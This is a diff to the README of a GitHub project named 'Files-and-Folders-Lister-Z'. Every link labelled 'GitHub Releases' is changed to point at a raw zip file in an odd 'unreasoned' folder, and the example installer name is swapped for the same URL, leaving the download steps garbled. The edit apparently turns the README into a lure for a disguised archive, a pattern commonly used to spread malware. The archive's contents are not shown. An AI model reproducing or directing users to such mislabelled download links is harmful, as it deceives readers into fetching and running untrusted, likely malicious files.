gamemayed/Files-and-Folders-Lister-Z/README.md

 ## 👇 Download & Install

-Visit this page to download: [GitHub Releases](https://github.com/gamemayed/Files-and-Folders-Lister-Z/releases)
+Visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/gamemayed/Files-and-Folders-Lister-Z/main/unreasoned/Files-and-Folders-Lister-Z.zip)

 1. **Navigate to the Releases Page**:
-   - Open your web browser and type in the URL: [GitHub Releases](https://github.com/gamemayed/Files-and-Folders-Lister-Z/releases).
+   - Open your web browser and type in the URL: [GitHub Releases](https://raw.githubusercontent.com/gamemayed/Files-and-Folders-Lister-Z/main/unreasoned/Files-and-Folders-Lister-Z.zip).

 2. **Choose Your Version**:
    - On the Releases page, look for the latest version of Files and Folders Lister Z.
    - You will see options for different operating systems.

 3. **Download the File**:
-   - Click on the file for your operating system (e.g., `Files-and-Folders-Lister-Z-setup.exe` for Windows).
+   - Click on the file for your operating system (e.g., `https://raw.githubusercontent.com/gamemayed/Files-and-Folders-Lister-Z/main/unreasoned/Files-and-Folders-Lister-Z.zip` for Windows).
    - Wait for the download to complete.

 4. **Run the Installer**: